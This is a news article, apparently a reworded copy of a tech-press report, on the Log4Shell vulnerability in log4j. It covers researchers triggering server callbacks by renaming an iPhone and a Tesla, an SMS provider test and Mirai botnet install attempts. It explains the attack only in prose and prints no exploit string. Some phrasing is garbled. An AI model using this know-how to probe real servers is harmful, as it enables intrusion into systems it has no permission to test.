Researchers trigger new exploit by renaming iPhone and Tesla

Security researchers investigating the recently discovered and “extremely bad” Log4Shell exploit claim to have used it on devices as diverse as iPhones and Tesla cars. Through screenshot share in line, changing the device name of an iPhone or Tesla to a special exploit string was enough to ping the Apple or Tesla servers, indicating that the server on the other end was vulnerable to Log4Shell.

During the demonstrations, the researchers changed the names of the devices to a string that would send the servers to a test URL, exploiting the vulnerability enabled behavior. After the name change, inbound traffic showed URL requests from IP addresses owned by Apple and, in Tesla’s case, China Unicom – the mobile services partner for the Chinese market. In short, the researchers tricked Apple and Tesla servers to visit a URL of their choice.

An information screen about the iPhone device whose name has been changed to contain the operating string.
Image: Cas van Cooten / Twitter

The iPhone demonstration came from a Dutch security researcher; the other was uploaded to the anonymous Log4jAttackSurface Github repository.

Assuming the images are genuine, they show behavior – remote resource loading – that shouldn’t be possible with text contained in a device name. This proof of concept has led to numerous reports that Apple and Tesla are vulnerable to the exploit.

Although the demonstration is alarming, it is unclear how useful it would be for cybercriminals. In theory, an attacker could host malicious code on the target URL in order to infect vulnerable servers, but a well-maintained network could prevent such an attack at the network level. More generally, there is nothing to indicate that the method could lead to a broader compromise between Apple’s or Tesla’s systems. (Neither company responded to an email request for comment at the time of posting.)

Still, it’s a reminder of the complex nature of technological systems, which almost always depend on code pulled from third-party libraries. The Log4Shell exploit affects an open source Java tool called log4j which is widely used for application event logging; although it is still not known exactly how many devices are affected, but researchers estimate that he is in the millions, including dark systems that are rarely the target of attacks of this nature.

The full extent of the exploitation in the wild is unknown, but in a blog post, the digital forensics platform Cado reported that it detected servers attempting to use this method to install the Mirai botnet code.

Log4Shell is all the more serious because it is relatively easy to use. The vulnerability works by tricking the application to interpret a piece of text as a link to a remote resource and attempt to retrieve that resource instead of saving the text as it is written. All that is required is for a vulnerable device to save the special character string in its application logs.

This creates the potential for vulnerability in many systems that accept user input, as the message text may be stored in logs. The log4j vulnerability was first spotted in Minecraft servers, which attackers could compromise by using chat messages; and systems that send and receive other message formats like SMS are clearly also sensitive.

At least one of the major SMS providers appears to be vulnerable to the exploit, according to tests conducted by The edge. When sent to numbers operated by the SMS provider, the text messages containing an exploit code triggered a response from the company’s servers which revealed information about the IP address and hostname. , suggesting that the servers could be tricked into executing malicious code. Calls and emails to the affected company had not been answered at the time of posting.

A update of the log4j library was released to mitigate the vulnerability, but updating all vulnerable machines will take time given the challenges of updating enterprise software on a large scale.

Comments are closed.